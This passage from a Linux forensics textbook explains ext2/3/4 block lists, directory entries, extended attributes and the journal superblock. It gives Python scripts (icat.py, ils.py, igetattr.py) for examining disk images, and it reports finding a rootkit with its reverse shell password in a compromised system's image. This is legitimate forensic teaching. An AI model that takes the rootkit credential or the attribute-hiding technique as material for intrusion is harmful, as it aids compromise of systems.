            # now sort the list by logical block number
            leafNode.sort(key=lambda x: x.block)
            for leaf in leafNode:
                sb = leaf.startHi * pow(2, 32) + leaf.startLo
                eb = sb + leaf.len
                for j in range(sb, eb):
                    datablocks.append(j)
    else:
        # we have the old school blocks
        # number of blocks required, rounded up
        blocks = (inode.fileSize + blockSize - 1) // blockSize
        # get the direct blocks
        for i in range(0, 12):
            if i >= blocks:
                break
            datablocks.append(inode.block[i])
        # now do indirect blocks
        if blocks > 12:
            iddata = getDataBlock(imageFilename, offset, \
                inode.block[12], blockSize)
            for i in range(0, blockSize // 4):
                idblock = getU32(iddata, i * 4)
                if idblock == 0:
                    break
                else:
                    datablocks.append(idblock)
        # now double indirect blocks
        if blocks > (12 + blockSize // 4):
            diddata = getDataBlock(imageFilename, offset, \
                inode.block[13], blockSize)
            for i in range(0, blockSize // 4):
                didblock = getU32(diddata, i * 4)
                if didblock == 0:
                    break
                else:
                    iddata = getDataBlock(imageFilename, offset, \
                        didblock, blockSize)
                    for j in range(0, blockSize // 4):
                        idblock = getU32(iddata, j * 4)
                        if idblock == 0:
                            break
                        else:
                            datablocks.append(idblock)
        # now triple indirect blocks
        if blocks > (12 + blockSize // 4 + blockSize * blockSize // 16):
            tiddata = getDataBlock(imageFilename, offset, \
                inode.block[14], blockSize)
            for i in range(0, blockSize // 4):
                tidblock = getU32(tiddata, i * 4)
                if tidblock == 0:
                    break
                else:
                    diddata = getDataBlock(imageFilename, offset, \
                        tidblock, blockSize)
                    for j in range(0, blockSize // 4):
                        didblock = getU32(diddata, j * 4)
                        if didblock == 0:
                            break
                        else:
                            iddata = getDataBlock(imageFilename, offset, \
                                didblock, blockSize)
                            for k in range(0, blockSize // 4):
                                idblock = getU32(iddata, k * 4)
                                if idblock == 0:
                                    break
                                else:
                                    datablocks.append(idblock)
    return datablocks

The first helper function, getDataBlock, simply seeks to the correct place in the file image and then reads a block of data. The second function, getBlockList, is a bit more involved. It begins with a check to see if extents are in use. If extents are being used, most files have nothing but leaf nodes in the four entries from the inode block array. We do a quick check to see if the tree depth is zero and, if this is the case, simply read the entries from the inode block array. We do this not just to simplify the code for the most common case, but also because no further disk access is required to generate a block list.

If we have a multi-level tree, we save the current level of nodes and create an empty list of leaf nodes. We then begin a while loop on the line while currentLevel[0].depth != 0:. This loop will execute until the lowest level (leaf nodes) of the tree has been found. Any leaf nodes encountered while walking through the tree are appended to the leafNode list.

After exiting the while loop the leafNode list is sorted by logical block number on the line leafNode.sort(key=lambda x: x.block). Python has the ability to sort a list in place. In order to sort the list we require a function that returns the value to sort on for each item; it is passed into the sort method as the parameter named key. This is where the lambda comes in. In Python a lambda is an anonymous function. The construct key=lambda x: x.block is essentially the same as saying key=f where f is defined as follows:

def f(x):
    return x.block

You can easily see why you wouldn’t want to define a named function like this every time you wanted to perform a sort or other operation requiring a single use function. The lambda keyword makes your Python code much more compact and easier to understand once you know how it works.
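To see the two forms side by side, the sketch below sorts a few stand-in leaf records by logical block number, once with a lambda and once with a named function. The Leaf type and its values are invented for the example and are not the Extent class from extfs.py.

```python
from collections import namedtuple

# a stand-in for extent leaf nodes with only the fields needed here
Leaf = namedtuple("Leaf", ["block", "start"])

leaves = [Leaf(2048, 9000), Leaf(0, 5000), Leaf(1024, 7000)]

# sort in place using an anonymous key function
leaves.sort(key=lambda x: x.block)

# the same ordering using a named function
def by_block(x):
    return x.block

also_sorted = sorted([Leaf(2048, 9000), Leaf(0, 5000), Leaf(1024, 7000)],
                     key=by_block)

print([leaf.block for leaf in leaves])  # [0, 1024, 2048]
```

Note that the function itself is passed as the key, without parentheses; sort calls it once per item.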

The code to handle old school blocks is straightforward, but somewhat cumbersome, thanks to the nested loops to handle the indirect blocks. First we calculate the number of blocks required. Then we read in the direct blocks. If the file has any singly indirect blocks we use getDataBlock to read the block and then iterate over the list of up to 1024 blocks. We keep going until we hit the end of the list or an address of zero (which is invalid). If the address is zero, the break command is executed. This command will exit the current loop. If the current loop is nested inside another loop, only the innermost loop is exited. The doubly and triply indirect block handling code is similar, but with extra levels of nested loops.
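The behavior of break inside nested loops is easy to confirm with in-memory data. In the sketch below each inner list stands in for one indirect block that has already been read and decoded; collect_blocks and the addresses are hypothetical.

```python
def collect_blocks(indirect_lists):
    """Gather block addresses, stopping each list at its first zero entry."""
    blocks = []
    for block_list in indirect_lists:      # outer loop: one list per block
        for address in block_list:         # inner loop: entries in the block
            if address == 0:
                break                      # leaves the inner loop only
            blocks.append(address)
    return blocks

# the 99 after the zero is never reached, but the later lists still are
print(collect_blocks([[10, 11, 0, 99], [20, 0], [30, 31]]))
# [10, 11, 20, 30, 31]
```

Because break only ends the innermost loop, the outer loop moves on to the next list, just as the doubly indirect code moves on to the next singly indirect block.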

The icat.py script follows. It is similar to the istat.py file with the biggest difference being a call to getBlockList followed by a loop that prints (writes) every block to standard out.

#!/usr/bin/python
#
# icat.py
#
# This is a simple Python script that will
# print out the file for an inode from an ext2/3/4 filesystem inside
# of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

import extfs
import sys
import os.path
import subprocess
import struct
import time
from math import log

def usage():
    print("usage " + sys.argv[0] + \
        " <image file> <offset> <inode number>\n" \
        "Displays file for an inode from an image file")
    sys.exit(1)

def main():
    # three parameters are required: image file, offset, and inode number
    if len(sys.argv) < 4:
        usage()

    # make sure the image file exists
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        sys.exit(1)
    emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])
    # get inode location
    inodeLoc = extfs.getInodeLoc(sys.argv[3], \
        emd.superblock.inodesPerGroup)
    offset = emd.bgdList[inodeLoc[0]].inodeTable * \
        emd.superblock.blockSize + \
        inodeLoc[1] * emd.superblock.inodeSize
    with open(str(sys.argv[1]), 'rb') as f:
        f.seek(offset + int(sys.argv[2]) * 512)
        data = str(f.read(emd.superblock.inodeSize))
    inode = extfs.Inode(data, emd.superblock.inodeSize)
    datablock = extfs.getBlockList(inode, sys.argv[1], sys.argv[2], \
        emd.superblock.blockSize)
    for db in datablock:
        sys.stdout.write(extfs.getDataBlock(sys.argv[1], long(sys.argv[2]), \
            db, emd.superblock.blockSize))

if __name__ == "__main__":
    main()

Partial results from running icat.py against an inode associated with a rootkit are shown in Figure 7.23. The output from the script has been piped to xxd in order to properly display the hex values inside this program. The screenshot shows several embedded strings which contain error messages and even the reverse shell password of “sw0rdm4n”.

FIGURE 7.23

Partial results from icat.py against an inode associated with a rootkit on the PFE subject system. The output has been piped to xxd. Note that several error messages and the remote login password are visible in this screenshot.

Directory entries

We have learned that inodes contain all the metadata for a file. They also contain the location of the file’s data blocks. The only thing that remains to be known about a file is its name. This connection between an inode and a filename is made in directories. Not surprisingly, directories are stored in files in Linux, the operating system where everything is a file. In our discussion of inodes earlier in this chapter we did say that inode 2 was used to store the root directory.

The classic directory entry consists of a 4-byte inode number, followed by a 2-byte record length, then a 2-byte name length, and finally the name which may be up to 255 characters long. This is shown in Table 7.15. Notice that the name length is two bytes, yet the maximum name length can be stored in only one byte. This may have been done for byte alignment purposes originally.

Table 7.15. The classic directory entry structure.

Offset  Size  Name     Description
0x0     4     Inode    Inode
0x4     2     Reclen   Record length
0x6     2     Namelen  Name length
0x8           Name     Name string (up to 255 characters)

Realizing that the upper byte was unused, an (incompatible) filesystem feature, File Type, was created to re-purpose this byte to hold file type information. It should be fairly obvious why this is on the incompatible feature list, as interpreting this as part of the name length would make it seem like all the filenames had become garbled. This optimization speeds up any operations that only make sense for a certain type of file by eliminating the need to read lots of inodes merely to determine file type. The directory entry structure for systems with the File Type feature is shown in Table 7.16.

Table 7.16. Directory entry structure when File Type feature is enabled.

Offset  Size  Name      Description
0x0     4     Inode     Inode
0x4     2     Reclen    Record length
0x6     1     Namelen   Name length
0x7     1     Filetype  0x00 Unknown
                        0x01 Regular
                        0x02 Directory
                        0x03 Char device
                        0x04 Block device
                        0x05 FIFO
                        0x06 Socket
                        0x07 Symlink
0x8           Name      Name string (up to 255 characters)
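The layout in Table 7.16 can be decoded with one struct.unpack_from call followed by a slice for the name. The sketch below works on a hand-built entry for "." and assumes little-endian fields; parse_dir_entry is a hypothetical name for illustration.

```python
import struct

def parse_dir_entry(data, offset=0):
    """Return (inode, record length, file type, name) for one entry."""
    inode, rec_len, name_len, file_type = \
        struct.unpack_from("<IHBB", data, offset)
    name = data[offset + 8: offset + 8 + name_len]
    return inode, rec_len, file_type, name

# the "." entry of a root directory: inode 2, record length 12,
# name length 1, file type 0x02 (directory), name padded to 4 bytes
sample = struct.pack("<IHBB", 2, 12, 1, 2) + b".\x00\x00\x00"
inode, rec_len, file_type, name = parse_dir_entry(sample)
print("inode %d, record length %d, type %d" % (inode, rec_len, file_type))
```

The record length, not the name length, gives the distance to the next entry, so a parser advances its offset by rec_len after each entry.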

The original directories had no checksums or other tools for integrity checking. In order to add this functionality without breaking existing systems, a special type of directory entry known as a directory tail was developed. The directory tail has an inode value of zero which is invalid. Older systems see this and assume that the end of the directory (tail) has been reached. The record length is set correctly to 12. The directory tail structure is shown in Table 7.17.

Table 7.17. Directory tail structure.

Offset  Size  Name      Description
0x0     4     Inode     Set to zero (inode zero is invalid so it is ignored)
0x4     2     Reclen    Record length (set to 12)
0x6     1     Namelen   Name length (set to zero so it is ignored)
0x7     1     Filetype  Set to 0xDE
0x8     4     Checksum  Directory leaf block CRC32 checksum
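A parser can recognize the tail by testing the four fixed fields from Table 7.17 before reading the checksum. The following is a minimal sketch under that assumption; read_directory_tail is a made-up name and the checksum in the sample is an arbitrary number, not one computed from a real directory block.

```python
import struct

def read_directory_tail(data, offset=0):
    """Return the stored checksum if a directory tail is found, else None."""
    inode, rec_len, name_len, file_type, checksum = \
        struct.unpack_from("<IHBBI", data, offset)
    if inode == 0 and rec_len == 12 and name_len == 0 and file_type == 0xDE:
        return checksum
    return None

tail = struct.pack("<IHBBI", 0, 12, 0, 0xDE, 0x12345678)
print(hex(read_directory_tail(tail)))  # 0x12345678
```

Returning None for anything else lets the caller fall back to treating the bytes as an ordinary directory entry.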

The linear directories presented thus far in this section are fine as long as the directories do not grow too large. When directories become large, implementing hash directories can improve performance. Just as is done with the checksum, hash entries are stored after the end of the directory block in order to fool old systems into ignoring them. Recall that there is an ext4_index flag in the inode that will alert compatible systems to the presence of the hash entries.

The directory nodes are stored in a hashed balanced tree which is often shortened to htree. We have seen trees in our discussion of extents earlier in this chapter. Those familiar with NTFS know that directories on NTFS filesystems are stored in trees. In the NTFS case, nodes are named based on their filename. With htrees on extended filesystems nodes are named by their hash values. Because the hash value is only four bytes long, collisions will occur. For this reason, once a record has been located based on the hash value a string comparison of filenames is performed, and if the strings do not match, the next record (which should have the same hash) is checked until a match is found.

The root hash directory block starts with the traditional “.” and “..” directory entries for this directory and the parent directory, respectively. After these two entries (both of which are twelve bytes long), there is a 16-byte header, followed by 8-byte entries through the end of the block. The root hash directory block structure is shown in Table 7.18.

Table 7.18. Root hash directory block structure.

Offset  Size  Name          Description
0x0     12    Dot rec       “.” directory entry (12 bytes)
0xC     12    DotDot rec    “..” directory entry (12 bytes)
0x18    4     Inode no      Inode number set to 0 to make following be ignored
0x1C    1     Hash version  0x00 Legacy
                            0x01 Half MD4
                            0x02 Tea
                            0x03 Legacy unsigned
                            0x04 Unsigned half MD4
                            0x05 Unsigned Tea
0x1D    1     Info length   Hash info length (0x8)
0x1E    1     Indir levels  Depth of tree
0x1F    1     Unused flag   Flags (unused)
0x20    2     Limit         Max number of entries that follow this header
0x22    2     Count         Actual number of entries after header
0x24    4     Block         Block w/i directory for hash=0
0x28          Entries       Remainder of block is 8-byte entries

If there are any interior nodes, they have the structure shown in Table 7.19. Note that three of the fields are in italics. The reason for this is that I have found some code that refers to these fields and other places that seem to imply that these fields are not present.

Table 7.19. Interior node hash directory block structure. Entries in italics may not be present in all systems.

Offset  Size  Name         Description
0x0     4     Fake inode   Set to zero so this is ignored
0x4     2     Fake reclen  Set to block size (4k)
0x6     1     Name length  Set to zero
0x7     1     File type    Set to zero
0x8     2     Limit        Max entries that follow
0xA     4     Count        Actual entries that follow
0xE     4     Block        Block w/i directory for lowest hash value of block
0x12          Entries      Directory entries

The hash directory entries (leaf nodes) consist of two 4-byte values for the hash and block within the directory of the next node. The hash directory entries are terminated with a special entry with a hash of zero and the checksum in the second 4-byte value. These entries are shown in Table 7.20 and Table 7.21.

Table 7.20. Hash directory entry structure.

Offset  Size  Name   Description
0x0     4     Hash   Hash value
0x4     4     Block  Block w/i directory of next node

Table 7.21. Hash directory entry tail with checksum.

Offset  Size  Name      Description
0x0     4     Reserved  Set to zero
0x4     4     Checksum  Block checksum
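To make the lookup concrete, the sketch below decodes a run of 8-byte entries from Table 7.20 and picks the block whose hash range covers a target hash. It assumes the entries are sorted by hash and that hashes below the first entry belong to the Block field in the header (the one described as being for hash=0). The function names and the sample values are hypothetical, and the filename hash itself is not computed here.

```python
import bisect
import struct

def parseHashEntries(data, count):
    """Decode count little-endian (hash, block) pairs from packed data."""
    return [struct.unpack_from("<II", data, 8 * n) for n in range(count)]

def findLeafBlock(entries, firstBlock, targetHash):
    """Return the directory block whose hash range covers targetHash.

    entries must be sorted by hash; firstBlock covers every hash that is
    smaller than the hash of the first entry.
    """
    hashes = [h for h, _ in entries]
    pos = bisect.bisect_right(hashes, targetHash)
    if pos == 0:
        return firstBlock
    return entries[pos - 1][1]

# two made-up entries: hashes from 0x40000000 live in block 2,
# hashes from 0x80000000 live in block 3, everything lower in block 1
raw = struct.pack("<IIII", 0x40000000, 2, 0x80000000, 3)
entries = parseHashEntries(raw, 2)
for target in (0x00000010, 0x40000000, 0x90000000):
    print("hash 0x%08x -> block %d" % (target, findLeafBlock(entries, 1, target)))
```

Because of collisions, the block returned is only where to start looking. The filenames in that block still have to be compared as strings, as described earlier in this section.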

We can now add some code to our extfs.py file in order to interpret directories. To keep things simple, we won’t utilize the hash directories if they exist. For our purposes there is likely to be little if any speed penalty for doing so. The additions to our extfs.py file follow.

# converts the 1-byte file type from a directory entry to a string
def printFileType(ftype):
    if ftype == 0x0 or ftype > 7:
        return "Unknown"
    elif ftype == 0x1:
        return "Regular"
    elif ftype == 0x2:
        return "Directory"
    elif ftype == 0x3:
        return "Character device"
    elif ftype == 0x4:
        return "Block device"
    elif ftype == 0x5:
        return "FIFO"
    elif ftype == 0x6:
        return "Socket"
    elif ftype == 0x7:
        return "Symbolic link"

class DirectoryEntry():
    def __init__(self, data):
        self.inode = getU32(data)
        self.recordLen = getU16(data, 0x4)
        self.nameLen = getU8(data, 0x6)
        self.fileType = getU8(data, 0x7)
        self.filename = data[0x8 : 0x8 + self.nameLen]

    def prettyPrint(self):
        print("Inode: %s  File type: %s  Filename: %s" % (str(self.inode),
            printFileType(self.fileType), self.filename))

# parses directory entries in a data block that is passed in
def getDirectory(data):
    done = False
    retVal = []
    i = 0
    while not done:
        de = DirectoryEntry(data[i:])
        if de.inode == 0:
            done = True
        else:
            retVal.append(de)
        # a record shorter than its own 8-byte header is corrupt;
        # stop here rather than loop forever
        if de.recordLen < 8:
            break
        i += de.recordLen
        if i >= len(data):
            break
    return retVal

There are no new techniques in the code above. We can also create a new script, ils.py, which will create a directory listing based on an inode rather than a directory name. The code for this new script follows. You might notice that this script is very similar to icat.py with the primary difference being that the data is interpreted as a directory instead of being written to standard out.

#!/usr/bin/python
#
# ils.py
#
# This is a simple Python script that will
# print out the directory listing for an inode from an
# ext2/3/4 filesystem inside of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

import extfs
import sys
import os.path

def usage():
    print("usage " + sys.argv[0] + " <image file> <offset> <inode number>\n" \
        "Displays directory for an inode from an image file")
    sys.exit(1)

def main():
    # image file, offset, and inode number are all required
    if len(sys.argv) < 4:
        usage()

    # make sure the image file exists
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        sys.exit(1)

    emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])

    # get inode location
    inodeLoc = extfs.getInodeLoc(sys.argv[3], \
        emd.superblock.inodesPerGroup)
    offset = emd.bgdList[inodeLoc[0]].inodeTable \
        * emd.superblock.blockSize + \
        inodeLoc[1] * emd.superblock.inodeSize

    with open(str(sys.argv[1]), 'rb') as f:
        f.seek(offset + int(sys.argv[2]) * 512)
        data = str(f.read(emd.superblock.inodeSize))

    inode = extfs.Inode(data, emd.superblock.inodeSize)
    datablock = extfs.getBlockList(inode, sys.argv[1], sys.argv[2], \
        emd.superblock.blockSize)

    # concatenate every data block, then interpret it as a directory
    data = ""
    for db in datablock:
        data += extfs.getDataBlock(sys.argv[1], int(sys.argv[2]), db, \
            emd.superblock.blockSize)

    dirEntries = extfs.getDirectory(data)
    for fname in dirEntries:
        fname.prettyPrint()

if __name__ == "__main__":
    main()

The results from running the new script against the root directory (inode 2) and the /tmp directory from the PFE subject system are shown in Figure 7.24 and Figure 7.25, respectively. Notice that the “lost+found” directory is in inode 11 which is the expected place. In Figure 7.25 two files associated with a rootkit are highlighted.

FIGURE 7.24

Running ils.py against the root directory of the PFE subject system.

FIGURE 7.25

Running ils.py against the /tmp directory of the PFE subject system.
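If you do not have an image handy, the linear directory entry layout can still be exercised against a hand-built block. The sketch below is self-contained and does not use extfs.py. The names packDirEntry and walkDirectory are hypothetical, the block contents are made up, and unlike getDirectory it skips entries with an inode of zero instead of stopping at the first one.

```python
import struct

FILE_TYPES = {1: "Regular", 2: "Directory", 3: "Character device",
              4: "Block device", 5: "FIFO", 6: "Socket", 7: "Symbolic link"}

def packDirEntry(inode, name, fileType, recordLen):
    """Build one entry: 8-byte header, name, then zero padding to recordLen."""
    raw = struct.pack("<IHBB", inode, recordLen, len(name), fileType) + name
    return raw.ljust(recordLen, b"\x00")

def walkDirectory(block):
    """Yield (inode, type name, filename) for each in-use entry in a block."""
    i = 0
    while i + 8 <= len(block):
        inode, recordLen, nameLen, fileType = struct.unpack_from("<IHBB", block, i)
        if recordLen < 8:      # corrupt record length, stop rather than spin
            break
        if inode != 0:
            name = block[i + 8 : i + 8 + nameLen].decode("utf-8", "replace")
            yield inode, FILE_TYPES.get(fileType, "Unknown"), name
        i += recordLen

# a 1024-byte directory block: ".", "..", and lost+found in inode 11;
# the last record length runs to the end of the block
block = (packDirEntry(2, b".", 2, 12) + packDirEntry(2, b"..", 2, 12) +
         packDirEntry(11, b"lost+found", 2, 1000))
listing = list(walkDirectory(block))
for inode, typeName, name in listing:
    print("Inode: %d  File type: %s  Filename: %s" % (inode, typeName, name))
```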

Extended attributes

The extended filesystem family supports extended attributes. The first use of extended attributes was for Access Control Lists (ACL). While it is certainly not uncommon for extended attributes to house ACLs today, they can be used to store almost anything as a user attribute if the attribute name begins with “user.”. Something to keep in mind is that older kernels required the correct set of mounting options to be used when ACLs are implemented. This is another reason to capture the mount information during your live analysis.

If the extended attribute is small, it can be stored in the extra space between inodes. Currently there are 100 bytes of extra space. Larger extended attributes can be stored in a data block pointed to by file_acl in the inode. An attacker might use a user attribute to hide information on a hacked system. This is similar to using Alternate Data Streams (ADS) to attach hidden information to a file on an NTFS filesystem. There is one important difference between user attributes and ADS, however. There are standard tools for displaying extended attributes on Linux, and you need not know the exact attribute name to use them, as is the case with ADS.

Whether stored in inodes or data blocks, all extended attribute lists begin with a header. The header does vary in these two cases, however. The header inside the inode consists of a 4-byte magic number only. The extended attributes header structures for attributes stored in the inode and data block are shown in Table 7.22 and Table 7.23, respectively.

Table 7.22. Extended attribute header for attributes in an inode.

Offset  Size  Name      Description
0x0     4     Magic no  0xEA020000

Table 7.23. Extended attribute header for attributes in a data block.

Offset  Size  Name       Description
0x0     4     Magic no   0xEA020000
0x4     4     Ref count  Reference count
0x8     4     Blocks     Blocks used to store extended attributes
0xC     4     Hash       Hash
0x10    4     Checksum   Checksum
0x14    12    Reserved   Should be zeroed

The extended attribute entry or entries follow(s) the header. The extended attribute entry structure is shown in Table 7.24. Note the use of a name index in order to reduce storage.

Table 7.24. Extended attribute entry structure.

Offset  Size  Name         Description
0x0     1     Name len     Length of attribute name
0x1     1     Name index   0x0 = no prefix, 0x1 = user. prefix, 0x2 = system.posix_acl_access, 0x3 = system.posix_acl_default, 0x4 = trusted., 0x6 = security., 0x7 = system., 0x8 = system.richacl
0x2     2     Value offs   Offset from first inode entry or start of block
0x4     4     Value block  Disk block where value stored or zero for this block
0x8     4     Value size   Length of value
0xC     4     Hash         Hash for attribs in block or zero if in inode
0x10          Name         Attribute name w/o trailing NULL
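The entry layout in Table 7.24 can be decoded with a single struct format. The sketch below is an illustration under stated assumptions rather than the extfs.py implementation: parseAttrEntry is a hypothetical name, the sample bytes are synthetic, and the rounding of each entry to a 4-byte boundary reflects my understanding of how the kernel pads entries, so verify it against your own images.

```python
import struct

# name index codes from Table 7.24
PREFIXES = {0: "", 1: "user.", 2: "system.posix_acl_access",
            3: "system.posix_acl_default", 4: "trusted.",
            6: "security.", 7: "system.", 8: "system.richacl"}

def parseAttrEntry(data, offset=0):
    """Decode one extended attribute entry starting at offset."""
    (nameLen, nameIndex, valueOffs, valueBlock,
     valueSize, valueHash) = struct.unpack_from("<BBHIII", data, offset)
    rawName = data[offset + 0x10 : offset + 0x10 + nameLen]
    # assumption: 16-byte header plus name, rounded up to a multiple of 4
    nextOffset = offset + ((0x10 + nameLen + 3) & ~3)
    return {"name": PREFIXES.get(nameIndex, "") + rawName.decode("utf-8", "replace"),
            "valueOffs": valueOffs,
            "valueBlock": valueBlock,
            "valueSize": valueSize,
            "hash": valueHash,
            "nextOffset": nextOffset}

# synthetic entry: user.comment, 5-byte value stored at offset 0x60
sample = struct.pack("<BBHIII", 7, 1, 0x60, 0, 5, 0) + b"comment" + b"\x00"
entry = parseAttrEntry(sample)
print("%s (value size %d, next entry at %d)" %
      (entry["name"], entry["valueSize"], entry["nextOffset"]))
```

Storing only “comment” on disk and rebuilding “user.comment” from the one-byte index is the storage saving the name index provides.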

The standard Linux commands for displaying extended attribute and ACL information are getfattr and getfacl, respectively. Not surprisingly, the commands to alter extended attributes and ACLs are setfattr and setfacl, respectively. See the man pages for details on these commands. Basic usage of these commands is demonstrated in Figure 7.26.

FIGURE 7.26

Using the commands to set and get extended attributes.

The following code will add extended attribute support to our extfs Python module. There are no previously undiscussed techniques in this code.

"""
printExtAttrPrefix. Converts a 1-byte prefix
code for an extended attribute name to a string.
Usage: prefixString = printExtAttrPrefix(index)
"""
def printExtAttrPrefix(index):
    if index == 0 or index > 8:
        return ""
    elif index == 1:
        return "user."
    elif index == 2:
        return "system.posix_acl_access"
    elif index == 3:
        return "system.posix_acl_default"
    elif index == 4:
        return "trusted."
    elif index == 6:
        return "security."
    elif index == 7:
        return "system."
    elif index == 8:
        return "system.richacl"
    # index 5 is not listed in Table 7.24, so treat it as no prefix
    return ""

"""
Class ExtAttrEntry. Stores the raw
extended attribute structure with the
prefix prepended to the attribute name.
Usage: ea = ExtAttrEntry(data, offset=0)
where data is a packed string representing the
extended attribute and offset is the starting point
in this block of data for this entry.
"""
class ExtAttrEntry():
    def __init__(self, data, offset=0):
        self.nameLen = getU8(data, offset + 0x0)
        self.nameIndex = getU8(data, offset + 0x1)
        self.valueOffset = getU16(data, offset + 0x2)
        self.valueBlock = getU32(data, offset + 0x4)
        self.valueSize = getU32(data, offset + 0x8)
        self.valueHash = getU32(data, offset + 0xc)
        self.name = printExtAttrPrefix(self.nameIndex) + \
            str(data[offset + 0x10 : offset + 0x10 + self.nameLen])

"""
Usage:
getExtAttrsFromBlock(imageFilename, offset, blockNo, blocksize)
where imageFilename is a raw ext2/ext3/ext4 image, offset is
the offset in 512 byte sectors to the start of the filesystem,
blockNo is the data block holding the extended attributes, and
blocksize is the filesystem block size (default=4k).
"""
def getExtAttrsFromBlock(imageFilename, offset, \
        blockNo, blockSize=4096):
    data = getDataBlock(imageFilename, offset, \
        blockNo, blockSize)
    return getExtAttrsHelper(False, imageFilename, \
        offset, data, blockSize)

"""
Usage:
getExtAttrsInInode(imageFilename, offset, data, blocksize)
where imageFilename is a raw ext2/ext3/ext4 image, offset is
the offset in 512 byte sectors to the start of the filesystem,
data is the packed string holding the extended attributes, and
blocksize is the filesystem block size (default=4k).
"""
def getExtAttrsInInode(imageFilename, offset, data, blockSize=4096):
    return getExtAttrsHelper(True, imageFilename, offset, data, blockSize)

# This is a helper function for the preceding two functions
def getExtAttrsHelper(inInode, imageFilename, offset, data, blockSize=4096):
    retVal = {}
    # first four bytes are magic number
    if getU32(data, 0) != 0xEA020000:
        return retVal
    # entries follow the 4-byte inode header or the 32-byte block header
    if inInode:
        i = 4
    else:
        i = 32
    # per Table 7.24, value offsets are relative to the first entry
    # when in the inode and to the start of the block otherwise
    if inInode:
        base = 4
    else:
        base = 0
    done = False
    while not done and i + 0x10 <= len(data):
        eae = ExtAttrEntry(data, i)
        # is this an extended attribute or not
        if eae.nameLen == 0 and eae.nameIndex == 0 and eae.valueOffset == 0 \
                and eae.valueBlock == 0:
            done = True
        else:
            # is the value stored with the entries or in an external block?
            if eae.valueBlock == 0:
                start = base + eae.valueOffset
                v = data[start : start + eae.valueSize]
            else:
                v = getDataBlock(imageFilename, offset, eae.valueBlock, \
                    blockSize)[eae.valueOffset : eae.valueOffset + eae.valueSize]
            retVal[eae.name] = v
            # 16-byte entry header plus the name, padded to a 4-byte boundary
            i += (0x10 + eae.nameLen + 3) & ~3
    return retVal

The following script can be used to print out extended attributes for an inode in an image. I include this mostly for completeness. If you mount the filesystem image, it is easy to list out these attributes using standard system tools discussed in this section.

#!/usr/bin/python
#
# igetattr.py
#
# This is a simple Python script that will
# print out extended attributes in an inode from an ext2/3/4
# filesystem inside of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

import extfs
import sys
import os.path

def usage():
    print("usage " + sys.argv[0] + " <image file> <offset> <inode number>\n" \
        "Displays extended attributes in an image file")
    sys.exit(1)

def main():
    # image file, offset, and inode number are all required
    if len(sys.argv) < 4:
        usage()

    # make sure the image file exists
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        sys.exit(1)

    emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])

    # get inode location
    inodeLoc = extfs.getInodeLoc(sys.argv[3], \
        emd.superblock.inodesPerGroup)
    offset = emd.bgdList[inodeLoc[0]].inodeTable * \
        emd.superblock.blockSize + inodeLoc[1] * emd.superblock.inodeSize

    with open(str(sys.argv[1]), 'rb') as f:
        f.seek(offset + int(sys.argv[2]) * 512)
        data = str(f.read(emd.superblock.inodeSize))

    inode = extfs.Inode(data, emd.superblock.inodeSize)

    if inode.hasExtendedAttributes:
        # is it in the inode slack or a data block
        if inode.extendAttribs == 0:
            attrs = extfs.getExtAttrsInInode(sys.argv[1], int(sys.argv[2]), \
                data[inode.inodeSize:], emd.superblock.blockSize)
        else:
            # extendAttribs holds the block number of the attribute block
            attrs = extfs.getExtAttrsFromBlock(sys.argv[1], int(sys.argv[2]), \
                inode.extendAttribs, emd.superblock.blockSize)
        for k, v in attrs.items():
            print("%s: %s" % (k, v))
    else:
        print("Inode %s has no extended attributes" % (sys.argv[3]))

if __name__ == "__main__":
    main()

JOURNALING

As previously mentioned, the journal is used to increase the likelihood of the filesystem being in a consistent state. As with most things Linux, the journaling behavior is highly configurable. The default is to only write metadata (not data blocks) through the journal. This is done for performance reasons. The default can be changed via the mount data option. The option data=journal causes all data blocks to be written through the journal. There are other options as well. See the mount man page for details.

The journal causes data to be written twice. The first time data is written to the disk as quickly as possible. To accomplish this, the journal is stored in one block group and often is the only thing stored in the group. This minimizes disk seek times. Later, after the data has been committed to the journal, the operating system will write the data to the correct location on the disk and then erase the commitment record. This not only improves data integrity but it also improves performance by caching many small writes before writing everything to disk.

The journal is normally stored in inode 8, but it may optionally be stored on an external device. The latter does not seem to be very common. Regardless of where it is stored, the journal contains a special superblock that describes itself. When examining the journal directly it is important to realize that the journal stores information in big endian format. The journal superblock is summarized in Table 7.25.

Table 7.25. The journal superblock.

Offset  Type  Name                 Description
0x0     be32  h_magic              Jbd2 magic number, 0xC03B3998
0x4     be32  h_blocktype          Should be 4, journal superblock v2
0x8     be32  h_sequence           Transaction ID for this block
0xC     be32  s_blocksize          Journal device block size.
0x10    be32  s_maxlen             Total number of blocks in this journal.
0x14    be32  s_first              First block of log information.
0x18    be32  s_sequence           First commit ID expected in log.
0x1C    be32  s_start              Block number of the start of log.
0x20    be32  s_errno              Error value, as set by jbd2_journal_abort().
0x24    be32  s_feature_compat     Compatible features. 0x1 = Journal maintains checksums
0x28    be32  s_feature_incompat   Incompatible feature set.
0x2C    be32  s_feature_ro_compat  Read-only compatible feature set. There aren’t any of these currently.
0x30    u8    s_uuid[16]           128-bit uuid for journal. This is compared against the copy in the ext4 superblock at mount time.
0x40    be32  s_nr_users           Number of filesystems sharing this journal.
0x44    be32  s_dynsuper           Location of dynamic superblock copy.
0x48    be32  s_max_transaction    Limit of journal blocks per transaction.
0x4C    be32  s_max_trans_data     Limit of data blocks per transaction.
0x50    u8    s_checksum_type      Checksum algorithm used for the journal. Probably 1 = crc32 or 4 = crc32c.
0x51    0xAB  Padding              0xAB bytes of padding
0xFC    be32  s_checksum           Checksum of the entire superblock, with this field set to zero.
0x100   u8    s_users[16*48]       IDs of all filesystems sharing the log.
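Because the journal is big endian while the rest of the filesystem is little endian, it is easy to misread. The sketch below decodes the first fields of Table 7.25 with an explicit big endian format. It is a minimal illustration: parseJournalSuperblock is a hypothetical name, and the sample superblock is synthetic with made-up values.

```python
import struct

JBD2_MAGIC = 0xC03B3998

# names of the twelve 32-bit fields at offsets 0x0 through 0x2C
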